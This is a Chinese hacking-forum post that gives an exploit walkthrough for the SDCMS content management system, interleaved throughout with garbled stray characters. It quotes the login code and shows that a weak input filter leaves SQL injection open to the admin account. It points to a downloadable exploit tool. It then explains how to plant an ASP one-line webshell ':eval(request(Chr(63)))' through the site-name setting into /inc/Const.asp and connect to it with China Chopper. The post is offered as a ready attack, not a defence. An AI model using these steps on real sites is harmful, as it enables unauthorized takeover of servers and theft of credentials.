作者:T00LS 鬼哥) I, W# i( z& A! k: |+ }
漏洞文件:后台目录/index.asp { C' X, ?% ~2 O* ?
3 m: u8 r: D6 a# _6 ESub Check( l1 d8 W5 ]9 ]: j: W' |1 @% A0 P
Dim username,password,code,getcode,Rs
9 r/ k6 z8 z. O6 E/ b4 G IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub, j0 n! A1 {. K9 t: E, q) ^" |8 u
username=FilterText(Trim(Request.Form("username")),1)
9 M1 Z0 |7 l; R1 x. t% \. u password=FilterText(Trim(Request.Form("password")),1)
" V1 l) u9 Z2 P0 L- r' q* q code=Trim(Request.Form("yzm"))
% M* ]( X+ ?' K" z0 m, D7 t" g o getcode=Session("SDCMSCode")' f4 m2 G) x) d' G
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died% I: o7 T& b5 r3 N% T
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
: L* t# j+ z4 X4 a( X4 [0 f7 ]) { IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
- ?7 R, i$ z e! }9 Q4 J IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
( H+ ]9 `" [ E2 M IF username="" or password="" Then, ]2 \3 i. m, g' ]' u
Echo "用户名或密码不能为空"ied- p# C4 p( N8 o4 K0 U: r8 u. Q! S
Else
5 v* Z4 C! H; I+ a Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
, r w- L2 g. m- N ] IF Rs.Eof Then
3 W k% t2 Z2 Q9 k" t% n% A: A AddLog username,GetIp,"登录失败",1
3 [% l. O! k. }$ A& m) M" u Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"! E7 E3 X7 R6 F$ R' L2 `
Else
1 |4 w2 I% f1 q# Y7 x+ @" Y* U Add_Cookies "sdcms_id",Rs(0)8 B2 R. x6 x0 _: G( M/ C* E
Add_Cookies "sdcms_name",username
& b* S) R) \: g6 w Add_Cookies "sdcms_pwd",Rs(2)
2 ` T2 E" R) f) Q- e+ X& V Add_Cookies "sdcms_admin",Rs(3)
5 s- A+ ^& L5 P5 Z" \ Add_Cookies "sdcms_alllever",Rs(4)
+ L3 y8 S) ?8 v( {% b+ @4 u Add_Cookies "sdcms_infolever",Rs(5): s9 q) h: o0 X9 }3 ~
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
) R! D* s! [; J: G; }+ A AddLog username,GetIp,"登录成功",1 v: N( N4 g N. k+ l e; {
'自动删除30天前的Log记录. k4 t) O5 i4 o9 f% ~( g( u' h
IF Sdcms_DataType Then \: b& P3 h! X
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")' `/ A ?8 x. _' j1 x- R" X3 Q) y
Else0 K7 k" O' F$ o: Y
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")) s. W0 ?# ]5 Z4 Y p5 z9 L; u
End IF
- B: A8 o9 A4 R4 d Go("sdcms_index.asp")
$ H H8 C- h7 h& w8 o" J& q End IF
+ [0 z5 ]8 x2 J% Q& X Rs.Close
/ e- C' _7 _6 C3 c3 v Set Rs=Nothing
8 `( Y3 @. C% A( L End IF
2 p- K9 h! [6 m( n$ d! xEnd Sub
( O, U1 S: a/ r/ ^' h0 U% N& k1 G8 u" F0 h' ^! r4 x' z8 Q3 U
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
" Y* h: D3 q# M# [# U% l- }9 [
/ s3 x2 I; Y# Q1 S- C8 d! BFunction FilterText(ByVal t0,ByVal t1)% X% q0 T$ [ a6 p% Q: }5 ]0 |
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
9 C! S( N) K4 F" \4 G t0=Trim(t0)
/ q u$ E1 I+ B$ `, e7 o9 x Select Case t11 y$ Z# W. J# b5 E5 X
Case "1"
5 i- H- V* I/ A ~7 f- x3 @, I t0=Replace(t0,Chr(32),"")
3 B! h& e: O9 I8 L t0=Replace(t0,Chr(13),"")
3 Q2 i( C7 d m. o' d; k t0=Replace(t0,Chr(10)&Chr(10),"")" _5 h7 `7 X! c: ~. j8 L" G* s- `- e8 ~
t0=Replace(t0,Chr(10),"")4 W8 h0 M0 R2 E1 Y
Case "2"
# w# F& e1 ^9 G. d* Y* ~ t0=Replace(t0,Chr(8),"")'回格1 J3 f. x+ Q5 z* E
t0=Replace(t0,Chr(9),"")'tab(水平制表符)- ]/ z5 ]1 N' F) A/ @
t0=Replace(t0,Chr(10),"")'换行- m- X' ]# W _" f, K$ j
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)+ S2 X" F) w/ H1 u6 ?0 G9 E
t0=Replace(t0,Chr(12),"")'换页
: t6 E& C1 R; ~% w+ `) d t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
, T8 k7 L. O7 A* Y6 l t0=Replace(t0,Chr(22),"")
# ]$ Z$ f* I5 \, _4 Q5 S$ I t0=Replace(t0,Chr(32),"")'空格 SPACE
$ w! g) J" p; }" o7 { t0=Replace(t0,Chr(33),"")'!# ?/ x9 O. ^) ^" [/ @' N
t0=Replace(t0,Chr(34),"")'"/ j& b+ g9 u* B. Y* h2 g* U
t0=Replace(t0,Chr(35),"")'#& y" K- q: | ?; ^
t0=Replace(t0,Chr(36),"")'$7 N9 J3 r* r8 Y* U) J
t0=Replace(t0,Chr(37),"")'%
$ S' U& B0 C+ ? t0=Replace(t0,Chr(38),"")'&
6 [& P* k3 [0 k t0=Replace(t0,Chr(39),"")''
2 D2 d" H" H8 G3 ^) a9 x) s t0=Replace(t0,Chr(40),"")'(
5 U6 R+ j1 n8 g t0=Replace(t0,Chr(41),"")')5 n; c) a# @6 `5 N% s
t0=Replace(t0,Chr(42),"")'*
3 I; |1 U3 {7 i' A6 m$ K/ p5 V t0=Replace(t0,Chr(43),"")'+4 {8 \$ ~7 k7 s2 X
t0=Replace(t0,Chr(44),"")',
* v1 A; |1 L1 w t0=Replace(t0,Chr(45),"")'-
9 P" t Q' l& t) V% ]! _1 D7 I# v t0=Replace(t0,Chr(46),"")'.! `$ `9 S) l! X$ _* I
t0=Replace(t0,Chr(47),"")'/
) `8 r, N. x! g8 n D2 J; U& r t0=Replace(t0,Chr(58),"")':
/ t: U- ]3 U0 f. U0 \ t0=Replace(t0,Chr(59),"")';% L: A/ Y* H7 H, ` _* z( w
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
W7 }# U8 v& ]' z t0=Replace(t0,Chr(63),"")'?
- _' b, [! Q2 O+ y& [/ D t0=Replace(t0,Chr(64),"")'@
, W; A0 s3 f1 T4 y& ?6 P t0=Replace(t0,Chr(91),"")'\
9 y& l; @' Y2 V6 j; A t0=Replace(t0,Chr(92),"")'\- i+ j' C1 o- d* `' ~
t0=Replace(t0,Chr(93),"")']. E6 H. v6 p3 ^. k; u# c# t$ z
t0=Replace(t0,Chr(94),"")'^
9 f% d3 b) `$ P! d# ]; r t0=Replace(t0,Chr(95),"")'_6 p ^6 m1 `' H- V
t0=Replace(t0,Chr(96),"")'`3 k$ O* Z1 m- A$ S8 B# ^, S
t0=Replace(t0,Chr(123),"")'{( d0 ~ y y4 p8 e, r) z5 D
t0=Replace(t0,Chr(124),"")'|6 u' b5 e' l: s
t0=Replace(t0,Chr(125),"")'}
0 P9 i6 E) X- l2 X6 M. R t0=Replace(t0,Chr(126),"")'~6 P0 V& j5 e% w, }
Case Else
( O( v$ A1 i' U8 z2 g t0=Replace(t0, "&", "&")
3 w& \) R6 i: C% }8 \# R t0=Replace(t0, "'", "'")' n8 \3 D* |/ f! p2 G
t0=Replace(t0, """", """)
9 ^ ]# Q( w. T3 N1 u, x6 V2 G$ `0 ] t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">"). @6 S- e9 u7 Z! y9 w
End Select
% e1 V6 \$ e" z; x0 n1 Q& W IF Instr(Lcase(t0),"expression")>0 Then
6 E# w( R( l1 X1 B1 y t0=Replace(t0,"expression","e­xpression", 1, -1, 0)- O7 v! k9 `. w8 W) z; E0 V: o
End If
) U. l' j7 T* y6 s; \' N! F FilterText=t0
+ [2 u# f! g( `0 s# {& YEnd Function! h9 G) Z0 N/ ^( H4 Z2 B
, y7 t W% ^$ A* j& d" I
看到没。直接参数是1 只过滤
& Q( k% H! g% D+ L7 ~) t t0=Replace(t0,Chr(32)," ")
I7 w. H# ~6 S4 B8 F! L- V t0=Replace(t0,Chr(13),"")
+ s% K2 L4 j/ \6 D# X t0=Replace(t0,Chr(10)&Chr(10),"
% n! L- H! i) j2 u3 |")
) A' g8 w7 m% r" X t0=Replace(t0,Chr(10),"4 @% ?; Z1 ?8 ?) G& @5 U
")2 R0 A( s2 _ n% _9 O! t
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!0 [4 y. U6 N& x" Y/ G' A) O4 X
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP/ ]% I/ Q% P( |. g4 ~4 N
8 x* t* @3 S! `测试:7 Q. r/ _1 A7 o
" e( J' f g0 a
( F/ Y$ ?1 I* Y5 w5 W现在输入工具上验证码,然后点OK
' Z( D- B5 M% S, X' T* e
( S2 O* J8 R3 I! z5 ^* h0 x# z8 G4 h, m3 v1 _1 i) z: P. M
看到我们直接进入后台管理界面了,呵呵!
; J7 J8 d" j3 U9 @- L! e
3 M- N8 I3 p" j' g' r
& k# {4 T2 P: [' P' F7 S: f& x9 G! l# L6 s. l9 t& k# x
这样直接进入后台了。。。。, ?0 z" r# H% m! _/ E8 y
& G, b! d g& x4 k1 V, S- V
8 W. A6 J$ f0 y5 ^% W7 `7 V* r9 Z
) s& c+ }; \7 |! C" \3 Z
SDCMS提权:
9 A6 l& i4 A# f$ P( I5 p" z* v) o/ A$ b+ Y- @: G! E; D) _/ V$ P
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?) S! t7 l: ?) d' G! ?
4 \/ w9 u& c" J F% o8 K9 |
3 a Y* P4 x* e* x- {
8 E' f& A- E6 D) X7 I# @" J8 J& n5 H
OK,现在用菜刀连接下!
$ Z$ J+ G$ T7 N
/ N) y. x! d; z; b# P+ n9 p( o! y9 |! B+ M3 L
7 g, G- W1 u: Z; L
! g& z. {" J- Z
! f2 b9 G1 ?' G- Z7 C |
发表于 2012-11-9 20:57:02
收藏
支持
反对